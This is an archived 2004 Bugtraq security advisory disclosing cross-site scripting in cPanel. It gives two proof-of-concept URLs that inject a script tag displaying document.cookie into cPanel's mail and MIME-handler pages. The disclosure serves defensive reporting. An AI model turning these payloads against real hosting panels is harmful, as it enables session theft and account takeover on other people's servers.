More Cpanel Vuls (cross site scripting)

From: Fable (fable_at_hush.com)
Date: 03/23/04

  • Next message: Luigi Auriemma: "Server freeze in The Rage 1.01"
    Date: 23 Mar 2004 17:39:07 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    ##################################################
    ##Advisory Name: More Cpanel Vuls (cross site scripting)
    #Discovered by: Fable
    #Greets: 0x29A Crew, !AM Crew, Atomix, d3thstar, mgrd, rootthief.com.
    #Version Tested On: cPanel Build 9.1.0-STABLE 93
    ##Most likely effects more
    ##################################################

    ############
    #Description
    ############

    cPanel & WebHost Manager (WHM) is a next generation web hosting control
    panel system. Both cPanel & WHM are extremely feature rich as well as
    include an easy to use web based interface.

    ##############
    #Vulnerability
    ##############

    After some looking into, I found out that cPanel uses little or no html filters
    in their product. It's very simple to inject html in multiple areas in cpanel.
    I'll list the ones I've found so far.

    http://site.com:2082/frontend/x/mail/dodelautores.html?email=<script>alert(document.cookie)</script>
    http://site.com:2082/frontend/x/mime/addhandle.html?ext=phpz&handle=<script>alert(document.cookie</script>

    Note: Those should appear as < script > and < /script > with out the spaces of course.


  • Next message: Luigi Auriemma: "Server freeze in The Rage 1.01"

    Relevant Pages

    • [Full-disclosure] XSS and CSRF vulnerability on cPanel 11
      ... WHM interface provides access to the heart of the cPanel and WHM package ... DESCRIPTION OF THE VULNERABILITY ... There are XSS and CSRF (identified by ...
      (Full-Disclosure)
    • XSS and CSRF vulnerability on Cpanel 11
      ... WHM interface provides access to the heart of the cPanel and WHM package ... DESCRIPTION OF THE VULNERABILITY ... There are XSS and CSRF (identified by ...
      (Bugtraq)
    • Re: localtime is now wrong after server change
      ... WTF is WHM? ... That's the name of the server management program that I use. ... cPanel is given to the users to maintain their own part of the server ...
      (comp.lang.perl.misc)
    • Re: OT: Web Host / multi domains
      ... >>> I've been using affordablehost for a few years now. ... Have multiple ... >>> domains and have gotten used to cpanel and WHM. ...
      (alt.html)
    • [Full-Disclosure] cPanel symlink chmod issue
      ... cPanel allows logged in users to change permission of any file to 755. ... cPanel is a next generation web hosting control panel system. ... and then it is chmod() to 755. ...
      (Full-Disclosure)